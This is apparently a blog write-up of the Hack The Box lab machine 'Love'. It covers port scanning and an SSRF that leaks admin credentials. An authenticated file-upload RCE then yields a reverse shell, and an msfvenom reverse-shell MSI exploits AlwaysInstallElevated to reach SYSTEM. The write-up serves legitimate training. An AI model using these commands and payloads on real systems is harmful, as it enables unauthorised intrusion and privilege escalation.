18th September 2021
Hack The Box Write-Up Love by T13nn3s

Hack The Box Write-Up Love – 10.10.10.239

Overview

In this post, I’m writing a write-up for the machine Love from Hack The Box. Hack The Box is an online platform to train your ethical hacking skills and penetration testing skills

Love is an ‘Easy’ rated box. Grabbing and submitting the user.txt flag, your points will be raised by 10 and submitting the root flag you points will be raised by 20.

Foothold
The port scan shows a lot of open ports. The most interesting ports are 80/tcp and 443/tcp. Behind those ports, there is a PHP Voting system running and a Free File Scanner. By pointing the Free File Scanner to http://127.0.0.1:5000, we can get the credentials to log in as admin in the PHP Voting System.

User
Once we are in the PHP Voting System as the admin. We can exploit an authentication Remote Code Execution vulnerability to get a reverse shell as the user phoebe. After grabbing the user flag, we can proceed to the privilege escalation part.

Root
After running the enumeration tool winPEAS.exe, we can find that the software installation policy in the Windows Registry AlwaysInstallElevated policy is set to 1. This means that every user can install an MSI package as SYSYEM. After creating our payload with msfvenom we can establish a reverse shell as SYSTEM and own this machine.

Machine Info

Hack The Box Write-Up Love by T13nn3s
Hack The Box Write-Up Love by T13nn3s
Hack The Box Love Machine IP and maker
Hack The Box Love Machine IP and maker

Reconnaissance

Port scan

As always we start the machine with a port scan with Nmap.

┌──(root💀kali)-[/home/kali/htb/machines/love]                                                                                                                                                                 
└─# nmap -sC -sV -oA ./nmap/10.10.10.239 10.10.10.239 

The results.

Starting Nmap 7.91 ( https://nmap.org ) at 2021-06-21 16:06 EDT                                                                                                                                                
Nmap scan report for love.htb (10.10.10.239)                                                                                                                                                                   
Host is up (0.037s latency).                                                                                                                                                                                   
Not shown: 993 closed ports                                                                                                                                                                                    
PORT     STATE SERVICE      VERSION                                                                                                                                                                            
80/tcp   open  http         Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1j PHP/7.3.27)                                                                                                                            
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27 |_http-title: Voting System using PHP 135/tcp  open  msrpc       Microsoft Windows RPC 139/tcp  open  netbios-ssn  Microsoft Windows netbios-ssn 443/tcp  open  ssl/http     Apache httpd 2.4.46 (OpenSSL/1.1.1j PHP/7.3.27) |_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27 |_http-title: 403 Forbidden | ssl-cert: Subject: commonName=staging.love.htb/organizationName=ValentineCorp/stateOrProvinceName=m/countryName=in | Not valid before: 2021-01-18T14:00:16 |_Not valid after:  2022-01-18T14:00:16 |_ssl-date: TLS randomness does not represent time | tls-alpn:  |  http/1.1
445/tcp  open  microsoft-ds Windows 10 Pro 19042 microsoft-ds (workgroup: WORKGROUP)
3306/tcp open  mysql?
| fingerprint-strings: 
|   RTSPRequest: 
|_    Host '10.10.14.13' is not allowed to connect to this MariaDB server
5000/tcp open  http         Apache httpd 2.4.46 (OpenSSL/1.1.1j PHP/7.3.27)
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
|_http-title: 403 Forbidden
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port3306-TCP:V=7.91%I=7%D=6/21%Time=60D0F15A%P=x86_64-pc-linux-gnu%r(RT
SF:SPRequest,4A,"F\0\0\x01\xffj\x04Host\x20'10.10.14.13'\x20is\x20not\x
SF:20allowed\x20to\x20connect\x20to\x20this\x20MariaDB\x20server");
Service Info: Hosts: www.example.com, LOVE, www.love.htb; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|clock-skew: mean: 2h45m52s, deviation: 4h02m30s, median: 25m52s | smb-os-discovery:  |   OS: Windows 10 Pro 19042 (Windows 10 Pro 6.3) |   OS CPE: cpe:/o:microsoft:windows_10::- |   Computer name: Love |   NetBIOS computer name: LOVE\x00 |   Workgroup: WORKGROUP\x00 |  System time: 2021-06-21T13:32:46-07:00
| smb-security-mode: 
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2021-06-21T20:32:49
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 26.28 seconds

We can find several open ports. The ports 80/tcp and 443/tcp are point to a web service. And if we are reading the Nmap output carefully we can then see then at the certificate on port 443/tcp the subdomain staging.love.htb. Furthermore, we see the open ports 139/tcp (RPC) and 445/tcp (SMB). On these two ports, there is currently no guest access open, so we cannot perform further enumeration on them.

Enumeration webservice

After adding the subdomain staging.love.htb to our hosts’ file, along with the hostname love.htb, we can start with brute-forcing the directories. We start with brute-forcing the directories for the hostname love.htb.

┌──(root💀kali)-[/home/kali/htb/machines/love]
 └─# ffuf -c -w /usr/share/wordlists/wfuzz/general/big.txt -u http://love.htb/FUZZ --mc 200,204,301,302,207,401,405
         /'___\  /'___\           /'___\          
       /\ \__/ /\ \__/  __  __  /\ \__/           
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\           
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/            
          \ \_\   \ \_\  \ \____/  \ \_\              
           \/_/    \/_/   \/___/    \/_/           

v1.3.1 Kali Exclusive <3
 
:: Method           : GET
:: URL              : http://love.htb/FUZZ
:: Wordlist         : FUZZ: /usr/share/wordlists/wfuzz/general/big.txt
:: Follow redirects : false
:: Calibration      : false
:: Timeout          : 10
:: Threads          : 40
:: Matcher          : Response status: 200,204,301,302,207,401,405
----------------------------------------------------------------
admin                   [Status: 301, Size: 329, Words: 22, Lines: 10]
images                  [Status: 301, Size: 330, Words: 22, Lines: 10]
includes                [Status: 301, Size: 332, Words: 22, Lines: 10]
:: Progress: [3024/3024] :: Job [1/1] :: 1259 req/sec :: Duration: [0:00:02] :: Errors: 0 ::

Well, we have found three directories, this web service has at least an admin panel on http://love.htb/admin. We have also run the same directory brute-force for staging.love.htb, without any outcome. Let’s check the website behind the hostname love.htb.

Hack The Blox Love Voting System
http://love.htb

To log in, we need a voter’s ID and a password. After trying some ID and password combinations, without luck. We checked http://love.htb/admin, but we do not have a username or password. We tried the default username admin and password combination admin, without luck.

Let’s jump over to http://staging.love.htb. On the homepage, we can enter a name and email, noting juicy. But the http://staging.love.htb is more interesting, we can fill in an URL, and if we are hosting an HTTP server, we can see an incoming request coming in.

Hack The Box Love Free File Scanner
http://staging.love.htb/beta.php

Intrusion

Access to admin panel as admin

After some playing around with some payloads with msfvenom, we can see that our payload got opened, the contents of the shells are being displayed, but not executed. We came up with the idea to try all the other combinations we have found in the Nmap scan, and with the http://127.0.0.1:5000 as URL, we get some credentials back!

 Hack The Box Write-Up Love Free File Scanner
Free File Scanner Password Dashboard

We have now the credentials:

admin:@LoveIsInTheAir!!!!

We are a little surprised to suddenly be presented with a username and password combination. Let’s make use of it! We can log in through the admin panel on http://love.htb/admin with these credentials.

 Hack The Box Love admin access VotingSystem
http://love.htb/admin/home.php

After walking around on the platform, we see that we can create a user account for a voter. Let’s create a user account and then we can log in with the credentials as a voter. We can do this through the web page: http://love.htb/admin/voters.php

Firstname: John
Lastname: Doe
Password: JohnDoe!!!

We are getting back the Voters ID G5Rq4IebOydfATZ, Let’s log in as this account through http://love.htb. After logging, we can do a vote. But, did have to create an election. So, there is nothing we can do more from this page. We need to find a way to get access to the underlying system.

Exploitation

Reverse shell as phoebe

After searching for a vulnerability in the PHP Voting System, we came across a File Upload RCE (Authenticated Remote Code Execution) vulnerability. After downloading the exploit, we have to do a minimum modification to get this exploit working. We have to change the URLs to the values below.

INDEX_PAGE = f"http://{IP}/admin/index.php"
LOGIN_URL = f"http://{IP}/admin/login.php"
VOTE_URL = f"http://{IP}/admin/voters_add.php"
CALL_SHELL = f"http://{IP}/images/shell.php"

After this little modification we have to give the machine IP to this script and also our machine IP and port for the reverse shell and then we only have to run the script.

┌──(root💀kali)-[/home/kali/htb/machines/love]
└─# python3 49445.py
Start a NC listner on the port you choose above and run…
Logged in
Poc sent successfully

The reverse shell is established. We have a shell as the user account phoebe.

┌──(root💀kali)-[/home/kali/htb/machines/love]
└─# netcat -lnvp 4444
listening on [any] 4444 …
connect to [10.10.14.11] from (UNKNOWN) [10.10.10.239] 59481
b374k shell : connected

Microsoft Windows [Version 10.0.19042.867]
(c) 2020 Microsoft Corporation. All rights reserved.

C:\xampp\htdocs\omrs\images>whoami
whoami
love\phoebe

C:\xampp\htdocs\omrs\images>

Let’s switch from cmd to PowerShell, with the command powershell, and we can start our enumeration on the machine.

C:\xampp\htdocs\omrs\images>powershell
powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Try the new cross-platform PowerShell https://aka.ms/pscore6
 PS C:\xampp\htdocs\omrs\images>

No lateral movement needed now, we can read the user flag.

PS C:\xampp\htdocs\omrs\images> cd $env:userprofile\desktop; type user.txt
cd $env:userprofile\desktop; type user.txt
d447982622cfae5c58177cbe916cb797
PS C:\Users\Phoebe\desktop>

Let’s proceed with rooting this machine.

Privilege Escalation

Enumeration

We have tried some Windows PowerShell enumeration scripts, but they are not allowed to run. After downloading and running the enumeration tool winPEAS.exe to the machine, we can notice something interesting.

PS C:\Users\Phoebe\desktop> .\winpeas.exe
...
[+] Checking AlwaysInstallElevated                                                                                                                                  
    [?]  https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#alwaysinstallelevated                                                                  
     AlwaysInstallElevated set to 1 in HKLM!                                                                                                                           
     AlwaysInstallElevated set to 1 in HKCU!
...

The software policy is set to AlwaysInstallElevated to 1. This means that unprivileged users can install MSI packages with SYSTEM privileges. By creating an MSI payload with a reverse shell, we can do a privilege escalation.

Exploit AlwaysInstallElevated

Let’s create our payload with msfvenom.

┌──(root💀kali)-[/home/kali/htb/machines/love]
└─# msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.11 LPORT=4444 -f msi > revshell.msi                                                                                        130 ⨯
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of msi file: 159744 bytes

After downloading this payload to the machine, we can execute it to escalate our privileges, by running this command:

PS C:\Users\Phoebe\AppData\local\temp> msiexec /quiet /qn /i revshell.msi

We are using several flags after we executing the msiexec to install the MSI package.

  • /quiet – quiet mode, which means there’s no user interaction required.
  • /qn – specifies there’s no UI during the installation process.
  • /i – Specifies normal installation.

We have our meterpreter listening on port 5555, and the connection is coming in and established.

┌──(root💀kali)-[/home/kali/htb/machines/love]
└─# msfconsole
...
lport => 5555
msf6 exploit(multi/handler) > run

[-] Handler failed to bind to 10.10.14.11:5555:-  -
[-] Handler failed to bind to 0.0.0.0:5555:-  -
[-] Exploit failed [bad-config]: Rex::BindFailed The address is already in use or unavailable: (0.0.0.0:5555).
[*] Exploit completed, but no session was created.
msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 10.10.14.11:5555  [] Command shell session 1 opened (10.10.14.11:5555 -> 10.10.10.239:59497) at 2021-06-26 08:10:27 -0400
whoami
whoami
nt authority\system

C:\WINDOWS\system32>cd C:\users\administrator\desktop
cd C:\users\administrator\desktop

C:\Users\Administrator\Desktop>type root.txt
type root.txt
6cdb64e1ccbb19c1aed2542985303eb0

We have rooted Love! Well, this was a lovely machine to root. I have really enjoyed this machine. Do you want to thank me for this write-up? Please consider spending a respect point, my HTB profile: https://app.hackthebox.eu/users/224856.

Happy hacking! 🙂

T13nn3s

I'm a cybersecurity enthusiast! I'm working as an IT Security Engineer for a company in The Netherlands. I love writing scripts and doing research and pentesting. As a big fan of Hack The Box, I share my write-ups on this blog. I'm blogging because I like to summarize my thoughts and share them with you.

View all posts by T13nn3s →

Leave a Reply

Your email address will not be published. Required fields are marked *